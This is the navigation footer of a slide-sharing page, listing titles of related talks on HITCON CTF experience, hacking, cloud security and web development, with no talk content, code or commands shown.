Twitter Wanghongyang Backup Security 20090402 0713Hongyang Wang
 
twMVC#33玩轉 Azure 彈性部署
twMVC#33玩轉 Azure 彈性部署twMVC#33玩轉 Azure 彈性部署
twMVC#33玩轉 Azure 彈性部署twMVC
 
常用开发工具介绍
常用开发工具介绍常用开发工具介绍
常用开发工具介绍haozes
 
6.ctf经验分享
6.ctf经验分享6.ctf经验分享
6.ctf经验分享Hsiao Tim
 
Using google appengine_final
Using google appengine_finalUsing google appengine_final
Using google appengine_finalWei Sun
 
利用Signalr打造即時通訊@Tech day geek
利用Signalr打造即時通訊@Tech day geek利用Signalr打造即時通訊@Tech day geek
利用Signalr打造即時通訊@Tech day geekJohnson Gau
 
建立PHP & MySQL應用程式開發環境 - XAMPP安裝與測試
建立PHP & MySQL應用程式開發環境 - XAMPP安裝與測試建立PHP & MySQL應用程式開發環境 - XAMPP安裝與測試
建立PHP & MySQL應用程式開發環境 - XAMPP安裝與測試吳錫修 (ShyiShiou Wu)
 
開發的效能與效率-twMVC#15
開發的效能與效率-twMVC#15開發的效能與效率-twMVC#15
開發的效能與效率-twMVC#15twMVC
 
twMVC#15 | 開發的效能與效率
twMVC#15 | 開發的效能與效率twMVC#15 | 開發的效能與效率
twMVC#15 | 開發的效能與效率twMVC
 
百姓网如何优化网速-Qcon2011
百姓网如何优化网速-Qcon2011百姓网如何优化网速-Qcon2011
百姓网如何优化网速-Qcon2011Yiwei Ma
 

Similar to HITCON駭客戰隊與CTF經驗分享 (20)

從 HITCON 駭客戰隊 挑戰美國CGC天網機器人探討自動攻防技術發展 (Autonomous Hacking and Patching)
從 HITCON 駭客戰隊挑戰美國CGC天網機器人探討自動攻防技術發展(Autonomous Hacking and Patching)從 HITCON 駭客戰隊挑戰美國CGC天網機器人探討自動攻防技術發展(Autonomous Hacking and Patching)
從 HITCON 駭客戰隊 挑戰美國CGC天網機器人探討自動攻防技術發展 (Autonomous Hacking and Patching)
 
【HITCON FreeTalk】Supply Chain Attack
【HITCON FreeTalk】Supply Chain Attack【HITCON FreeTalk】Supply Chain Attack
【HITCON FreeTalk】Supply Chain Attack
 
Hello openstack 2014
Hello openstack 2014Hello openstack 2014
Hello openstack 2014
 
Spirent_securityLab-服務介紹_2022.pdf
Spirent_securityLab-服務介紹_2022.pdfSpirent_securityLab-服務介紹_2022.pdf
Spirent_securityLab-服務介紹_2022.pdf
 
新技术新挑战
新技术新挑战新技术新挑战
新技术新挑战
 
一個微信專案從0到000的效能調教
一個微信專案從0到000的效能調教一個微信專案從0到000的效能調教
一個微信專案從0到000的效能調教
 
20170430 python爬蟲攻防戰-攻防與金融大數據分析班
20170430 python爬蟲攻防戰-攻防與金融大數據分析班20170430 python爬蟲攻防戰-攻防與金融大數據分析班
20170430 python爬蟲攻防戰-攻防與金融大數據分析班
 
twMVC#22 | 什麼鬼的IOC與DI
twMVC#22 | 什麼鬼的IOC與DItwMVC#22 | 什麼鬼的IOC與DI
twMVC#22 | 什麼鬼的IOC與DI
 
Google雲端 第一章準備篇
Google雲端 第一章準備篇Google雲端 第一章準備篇
Google雲端 第一章準備篇
 
Twitter Wanghongyang Backup Security 20090402 0713
Twitter Wanghongyang Backup Security 20090402 0713Twitter Wanghongyang Backup Security 20090402 0713
Twitter Wanghongyang Backup Security 20090402 0713
 
twMVC#33玩轉 Azure 彈性部署
twMVC#33玩轉 Azure 彈性部署twMVC#33玩轉 Azure 彈性部署
twMVC#33玩轉 Azure 彈性部署
 
常用开发工具介绍
常用开发工具介绍常用开发工具介绍
常用开发工具介绍
 
6.ctf经验分享
6.ctf经验分享6.ctf经验分享
6.ctf经验分享
 
Using google appengine_final
Using google appengine_finalUsing google appengine_final
Using google appengine_final
 
利用Signalr打造即時通訊@Tech day geek
利用Signalr打造即時通訊@Tech day geek利用Signalr打造即時通訊@Tech day geek
利用Signalr打造即時通訊@Tech day geek
 
Hadoop ecosystem
Hadoop ecosystemHadoop ecosystem
Hadoop ecosystem
 
建立PHP & MySQL應用程式開發環境 - XAMPP安裝與測試
建立PHP & MySQL應用程式開發環境 - XAMPP安裝與測試建立PHP & MySQL應用程式開發環境 - XAMPP安裝與測試
建立PHP & MySQL應用程式開發環境 - XAMPP安裝與測試
 
開發的效能與效率-twMVC#15
開發的效能與效率-twMVC#15開發的效能與效率-twMVC#15
開發的效能與效率-twMVC#15
 
twMVC#15 | 開發的效能與效率
twMVC#15 | 開發的效能與效率twMVC#15 | 開發的效能與效率
twMVC#15 | 開發的效能與效率
 
百姓网如何优化网速-Qcon2011
百姓网如何优化网速-Qcon2011百姓网如何优化网速-Qcon2011
百姓网如何优化网速-Qcon2011
 

More from Alan Lee

Hitcon badge 2018
Hitcon badge 2018 Hitcon badge 2018
Hitcon badge 2018 Alan Lee
 
從 Facebook 事件內幕 談大 AI 時代下的雲端資料授權安全問題
從 Facebook 事件內幕談大 AI 時代下的雲端資料授權安全問題從 Facebook 事件內幕談大 AI 時代下的雲端資料授權安全問題
從 Facebook 事件內幕 談大 AI 時代下的雲端資料授權安全問題Alan Lee
 
Hitcon13 badge challenges
Hitcon13 badge challengesHitcon13 badge challenges
Hitcon13 badge challengesAlan Lee
 
雲端分散架構的駭客事件與安全問題
雲端分散架構的駭客事件與安全問題雲端分散架構的駭客事件與安全問題
雲端分散架構的駭客事件與安全問題Alan Lee
 
如何利用 MTK Linkit Smart 7688 設計出超炫的 HITCON CTF 決賽戰場燈控效果
如何利用 MTK Linkit Smart 7688 設計出超炫的 HITCON CTF 決賽戰場燈控效果如何利用 MTK Linkit Smart 7688 設計出超炫的 HITCON CTF 決賽戰場燈控效果
如何利用 MTK Linkit Smart 7688 設計出超炫的 HITCON CTF 決賽戰場燈控效果Alan Lee
 
CloudSEC 2015 Keynote 失衡的數位軍火發展
CloudSEC 2015 Keynote 失衡的數位軍火發展CloudSEC 2015 Keynote 失衡的數位軍火發展
CloudSEC 2015 Keynote 失衡的數位軍火發展Alan Lee
 
2015 hitcon ctf 1-2月計畫與展望
2015 hitcon ctf 1-2月計畫與展望2015 hitcon ctf 1-2月計畫與展望
2015 hitcon ctf 1-2月計畫與展望Alan Lee
 
Discovering botnets from dns traffic using map reduce 5.pptx
Discovering botnets from dns traffic using map reduce 5.pptxDiscovering botnets from dns traffic using map reduce 5.pptx
Discovering botnets from dns traffic using map reduce 5.pptxAlan Lee
 

More from Alan Lee (8)

Hitcon badge 2018
Hitcon badge 2018 Hitcon badge 2018
Hitcon badge 2018
 
從 Facebook 事件內幕 談大 AI 時代下的雲端資料授權安全問題
從 Facebook 事件內幕談大 AI 時代下的雲端資料授權安全問題從 Facebook 事件內幕談大 AI 時代下的雲端資料授權安全問題
從 Facebook 事件內幕 談大 AI 時代下的雲端資料授權安全問題
 
Hitcon13 badge challenges
Hitcon13 badge challengesHitcon13 badge challenges
Hitcon13 badge challenges
 
雲端分散架構的駭客事件與安全問題
雲端分散架構的駭客事件與安全問題雲端分散架構的駭客事件與安全問題
雲端分散架構的駭客事件與安全問題
 
如何利用 MTK Linkit Smart 7688 設計出超炫的 HITCON CTF 決賽戰場燈控效果
如何利用 MTK Linkit Smart 7688 設計出超炫的 HITCON CTF 決賽戰場燈控效果如何利用 MTK Linkit Smart 7688 設計出超炫的 HITCON CTF 決賽戰場燈控效果
如何利用 MTK Linkit Smart 7688 設計出超炫的 HITCON CTF 決賽戰場燈控效果
 
CloudSEC 2015 Keynote 失衡的數位軍火發展
CloudSEC 2015 Keynote 失衡的數位軍火發展CloudSEC 2015 Keynote 失衡的數位軍火發展
CloudSEC 2015 Keynote 失衡的數位軍火發展
 
2015 hitcon ctf 1-2月計畫與展望
2015 hitcon ctf 1-2月計畫與展望2015 hitcon ctf 1-2月計畫與展望
2015 hitcon ctf 1-2月計畫與展望
 
Discovering botnets from dns traffic using map reduce 5.pptx
Discovering botnets from dns traffic using map reduce 5.pptxDiscovering botnets from dns traffic using map reduce 5.pptx
Discovering botnets from dns traffic using map reduce 5.pptx
 

HITCON駭客戰隊與CTF經驗分享